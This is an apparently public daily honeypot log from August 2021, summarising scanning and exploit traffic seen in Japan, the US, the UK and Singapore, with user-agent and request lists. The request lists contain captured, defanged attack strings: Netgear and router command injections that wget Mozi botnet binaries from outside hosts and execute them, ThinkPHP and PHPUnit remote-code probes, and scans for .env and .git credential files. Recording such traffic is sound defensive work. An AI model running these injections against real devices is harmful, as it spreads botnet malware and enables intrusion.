コンニチハレバレトシタアオゾラ

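2021/08/27 Honeypot (tentative) observation log

This is the honeypot (tentative) observation log for 2021/08/27.

Characteristics
Common

Access targeting GPON router vulnerabilities
Access targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Access targeting the PHPUnit vulnerability (CVE-2017-9841)
Access targeting ThinkPHP vulnerabilities
Scanning for /.env
Scanning for Apache Solr
Scanning for Laravel
Scanning for WordPress plugins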

Location:JP

The following were observed:
Scanning by aiohttp
Scanning by zgrab
Scanning for phpMyAdmin
Scanning for WordPress
Malicious traffic related to 5[.]188[.]210[.]227
Access with the User-Agent "Hello, world"

Location:US

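The following were observed:
Access targeting vulnerabilities in Axis products
Access targeting vulnerabilities in NetGear products
Scanning by gbrmss
Scanning by Nmap Scripting Engine
Scanning by Wget
Scanning by zgrab
Scanning for phpMyAdmin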

Location:UK

The following were observed:
Access targeting vulnerabilities in NetGear products
Access with the User-Agent "Hello, world"
Gh0stRAT-like behavior

The following access to /shell was observed:

cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi[.]a;
/tmp/Mozi.a jaws

Location:SG

The following were observed:
Scanning by aiohttp
Scanning by Nmap Scripting Engine
Scanning by Wget
Scanning by zgrab
Scanning for Apache Tomcat
Scanning for WordPress
Malicious traffic related to 5[.]188[.]210[.]227

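Access count trend

JP: total accesses: 128 (vs. previous day: +40)
US: total accesses: 111 (vs. previous day: +54)
UK: total accesses: 59 (vs. previous day: +9)
SG: total accesses: 73 (vs. previous day: +14)

For practical reasons, GET / HTTP/1.1 and POST / HTTP/1.1 requests are excluded.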

Location:JP

Source IP address list

User-Agent list

Count UserAgent
18 -
8 Go-http-client/1.1
1 Hello, World
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
17 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
33 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
1 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
14 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
9 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (compatible; Baiduspider/2.0; +http[:]//www[.]baidu[.]com/search/spider.html)
1 Mozilla/5.0 zgrab/0.x
1 Python/3.7 aiohttp/3.7.4.post0
1 Roku/DVP-9.10 (289.10E04111A)
1 python-requests/2.18.4

Request list

Count Method Request Protocol
1 \x16\x03\x01
2 \x16\x03\x01\x01\xfa\x01
16 GET /.env HTTP/1.1
1 GET /.git HTTP/1.1
1 GET //MyAdmin/scripts/setup.php HTTP/1.1
1 GET //myadmin/scripts/setup.php HTTP/1.1
1 GET //phpMyAdmin/scripts/setup.php HTTP/1.1
1 GET //phpmyadmin/scripts/setup.php HTTP/1.1
1 GET //pma/scripts/setup.php HTTP/1.1
1 GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /2020/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /api/.env HTTP/1.1
2 GET /app/.env HTTP/1.1
1 GET /app/config/.env HTTP/1.1
1 GET /application/application.ini HTTP/1.1
1 GET /application/configs/application.ini HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /audio/.env HTTP/1.1
1 GET /backend/.env HTTP/1.1
1 GET /base/.env HTTP/1.1
1 GET /blob/.env HTTP/1.1
1 GET /blog/.env HTTP/1.1
1 GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /c/version.js HTTP/1.1
1 GET /cgi-bin/.env HTTP/1.1
1 GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /conf/.env HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /crm/.env HTTP/1.1
1 GET /database/.env HTTP/1.1
1 GET /ec2-18-179-20-5.ap-northeast-1.compute.amazonaws.com/.env HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /flu/403.html HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
2 GET /laravel/.env HTTP/1.1
1 GET /library/.env HTTP/1.1
1 GET /local/.env HTTP/1.1
1 GET /muieblackcat HTTP/1.1
1 GET /new/.env HTTP/1.1
1 GET /news/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /newsite/.env HTTP/1.1
1 GET /old/.env HTTP/1.1
1 GET /phpmyadmin/ HTTP/1.1
1 GET /protected/.env HTTP/1.1
1 GET /public/.env HTTP/1.1
1 GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /site/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /sites/all/libraries/mailchimp/.env HTTP/1.1
1 GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /solr/ HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /src/.env HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /storage/.env HTTP/1.1
1 GET /stream/live.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
1 GET /system_api.php HTTP/1.1
1 GET /test/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /vendor/.env HTTP/1.1
2 GET /vendor/laravel/.env HTTP/1.1
3 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /web/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /website/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp-admin/.env HTTP/1.1
1 GET /wp-content/.env HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /www/.env HTTP/1.1
2 GET /xmlrpc.php?rsd HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
7 GET http[:]//azenv[.]net/ HTTP/1.1
1 HEAD / HTTP/1.0\n
1 HEAD /robots.txt HTTP/1.0
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
9 POST /boaform/admin/formLogin HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1

Location:US

Source IP address list

User-Agent list

Count UserAgent
21 -
2 AccServer[HDVA-NIJ7UO5MTB]/6.6.0.22(43371) 64-bit HTTP-Agent
16 Go-http-client/1.1
1 Mozilla/5.0
2 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
9 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
4 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
1 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
4 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
1 Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
6 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (compatible; Baiduspider/2.0; +http[:]//www[.]baidu[.]com/search/spider.html)
4 Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)
1 Mozilla/5.0 zgrab/0.x
1 VLC/3.0.8 LibVLC/3.0.8
1 Wget/1.20.1 (linux-gnu)
1 gbrmss/7.29.0

Request list

Count Method Request Protocol
7 \x03
4 \x16\x03\x01
2 \x16\x03\x01\x01\xfb\x01
2 \x16\x03\x01\x02
1 CONNECT leakix[.]net:443 HTTP/1.1
1 GET /.DS_Store HTTP/1.1
8 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /.json HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /api/tokens HTTP/1.1
2 GET /axis-cgi/admin/param.cgi?action=list&group=Properties HTTP/1.0
1 GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0
1 GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0
1 GET /c/version.js HTTP/1.1
1 GET /config.json HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /evox/about HTTP/1.1
4 GET /favicon.ico HTTP/1.1
1 GET /flu/403.html HTTP/1.1
1 GET /guacamole/api/tokens HTTP/1.1
1 GET /idx_config/ HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /nmaplowercheck1630009058 HTTP/1.1
3 GET /phpmyadmin/index.php HTTP/1.1
2 GET /phpmyadmin4.8.5/index.php HTTP/1.1
4 GET /pmd/index.php HTTP/1.1
1 GET /recordings/theme/main.css HTTP/1.1
2 GET /robots.txt HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//113[.]239[.]217[.]154:46506/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /solr/ HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /somesomesome.txt HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /stream/live.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
1 GET /system_api.php HTTP/1.1
1 GET /telescope/requests HTTP/1.1
1 GET /v2/_catalog HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /webfig/ HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
5 GET http[:]//azenv[.]net/ HTTP/1.1
1 GET http[:]//example[.]com/ HTTP/1.1
1 HEAD / HTTP/1.0
1 HEAD /robots.txt HTTP/1.0
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
6 POST /boaform/admin/formLogin HTTP/1.1
1 POST /sdk HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1

Location:UK

Source IP address list

User-Agent list

Count UserAgent
13 -
9 Go-http-client/1.1
1 Hello, world
1 Mozilla/5.0
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
5 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
6 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
4 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Roku/DVP-9.10 (289.10E04111A)

Request list

Count Method Request Protocol
1 -
1 Gh0st\xad
4 \x16\x03\x01
1 \x16\x03\x01\x01 \x01
3 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /c/version.js HTTP/1.1
4 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /flu/403.html HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /public/.env HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//125[.]43[.]24[.]107:38486/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//59[.]94[.]180[.]65:53722/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /solr/ HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /somesomesome.txt HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /stream/live.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
1 GET /system_api.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /webfig/ HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
8 GET http[:]//azenv[.]net/ HTTP/1.1
1 GET http[:]//example[.]com/ HTTP/1.1
1 HEAD / HTTP/1.0
1 HEAD /robots.txt HTTP/1.0
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /HNAP1/ HTTP/1.0
1 POST /api/jsonws/invoke HTTP/1.1
6 POST /boaform/admin/formLogin HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1

Location:SG

Source IP address list

User-Agent list

Count UserAgent
13 -
5 Go-http-client/1.1
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
17 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
6 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
4 Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)
1 Mozilla/5.0 zgrab/0.x
2 Python/3.7 aiohttp/3.7.4.post0
1 User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705
1 Wget/1.20.1 (linux-gnu)
1 python-requests/2.18.4

Request list

Count Method Request Protocol
3 -
2 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
3 \x16\x03\x01
2 \x16\x03\x01\x02
4 GET /.env HTTP/1.1
1 GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /2020/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /CFIDE/administrator/ HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /ReportServer HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
1 GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /evox/about HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /news/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /nmaplowercheck1629923166 HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /site/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /solr/ HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /test/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /web/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /webfig/ HTTP/1.1
1 GET /website/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /xmlrpc.php?rsd HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
5 GET http[:]//azenv[.]net/ HTTP/1.1
1 HEAD / HTTP/1.1
1 HEAD /robots.txt HTTP/1.0
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /api/jsonws/invoke HTTP/1.1
6 POST /boaform/admin/formLogin HTTP/1.1
1 POST /sdk HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1